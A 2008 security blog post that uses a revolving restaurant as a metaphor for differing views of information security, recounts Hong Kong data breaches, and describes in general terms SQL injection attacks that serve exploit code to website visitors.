Bright Stove

Reflecting information risk journey

Revolving security

leave a comment »

Revolving restaurants are often a hit for children. They are also attractions for adults, but mostly during special occasions. Otherwise, they are often expensive places to dine in. However, the two groups of people are mostly intrigued by different aspects of the technology that is central to the concept leveraged in such restaurants. Adults visiting revolving restaurants like the idea that the restaurant provides a panaromic view of the areas, changing scenery can be enjoyed through the all glass window as the restaurant revolves around the axle of the tall tower. Children, as I observed and experienced as a kid previously, however, are mostly intrigued by the internal changes resulting from the movement. The food serving areas, in particular, is next to the table at one point, and moved away at another point, creating opportunities for another hide-and-seek type of games to chase around. The cost and the contents (i.e., food) are not the main things in such an experience for both groups.
 
Information security issues are like a revolving restaurant in many regards. People and organizations look at it from different perspectives — whether they are sitting by the window or near the revolving axle where the food and drinks are served, and also depends on their maturity or awareness level, i.e., different views of through the windows as the restaurant revolves. For example, government organizations tend to focus on the confidentiality of information because of their knowledge and concerns over national securiy, but people in general worried about their privacy when they know it can be compromised and stolen, otherwise, they would be more worried about viruses and malware, when they got hurt before. Private enterprises however tend to focus on access controls, since it is easier and less costly to do than contents protection. Enterprises are also worried about malware and viruses, since most of them got hurt by such attacks before as well. The type of technology that are deployed and when they deployed them depend on the area of focus (i.e., where they seat). Nobody however like the cost and efforts involved in implementing information securiy. Excepts for the information securty professionals, most users and organizations care even lesser about the elegance and innovation involved in informtion security technology (i.e., the food and drinks). 
 
This week, in Hongkong, I was invited to speak in four security gatherings, and also meet with a few senior people to discuss about security policies and strategies issues and solutions. Since the begining of the year, there have been a series of incidents relating to information breaches. Beginning with the HK singer/actor’s personal files been compromised by a computer repair guy, sharing them online, to a bank having a server stolen from a branch resuting in 159,000 customer records being held in an "unknown" status, to government department losing private data, and public hospital staff losing a USB thumb drive in a taxi containing 10,000 patient records. So, naturally, sitting next to such a window with such a view revolving in front of the Hongkongers, the focus is on information protection now.
 
Topics of virus attacks, malware infections, and even the current wave of web application attacks using SQL injection but targeting at end-users as the ultimate victims, have attracted less interest from these audiences (since they are not sitting next to the food and drinks where I sit.) The latter in fact is an emerging risk issue that are already affecting many web sites in the Asia Pacific and Greater China regions. Many web sites owners don’t even know that their web sites have been compromised, as the attackers are very clever in their tactics. They make use of SQL Injection attacks to get access to the database servers. Instead of corrupting, modifying, or retrieving information from the database server, they injected their exploit codes into the database systems. In this way, when the web application is accessed by the end users, normally the customers of the organization involved, the exploit code get served out by the application in the usual manner, and bingo, the end user systems get the infection and become a victim, if it does not have the necessary protection against the exploit. For those of you who are involved in securing your organization’s web server, or are concerned about this attack and want to make sure that the web sites are secure against the attacks, there are a few useful URLs that would provide guidance on how to do so.
 
These attacks are not capitalizing on new security loopholes, but something that have revolved back to our view, presented in a slightly different manner, based on known old problems relating to input validation.
 
Reflecting these developments, they serve to remind us the importance of defense-in-depth, not just simply building layers of defenses, but making sure that we look into the security needs for all layers. Increasingly, the proliferation of information devices have made information or data the window view that we see. But this requires actions at other layers at the same time, including application, operating systems, network, physical, and people. While we enjoy the panaromic view presented at the revolving restaurant, we also try to enjoy the food and drinks to make the cost and efforts worthwhile.
 
Happy dining!
 
Advertisements

Written by mengchow

May 23, 2008 at 6:32 am

Posted in Risk Management

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: